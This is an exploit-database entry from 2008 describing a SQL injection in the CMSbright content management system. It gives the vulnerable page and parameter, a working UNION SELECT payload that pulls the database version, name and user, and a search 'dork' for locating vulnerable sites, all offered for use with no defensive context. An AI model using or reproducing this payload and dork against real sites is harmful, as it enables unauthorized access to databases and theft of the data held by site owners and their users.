CMSbright (id_rub_page) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CMSbright (id_rub_page) Remote SQL Injection Vulnerability
# Published : 2008-09-01
# Author : BorN To K!LL
# Previous Title : EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability
# Next Title : WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit

-------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright ?? websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------

# www.Syue.com [2008-09-01]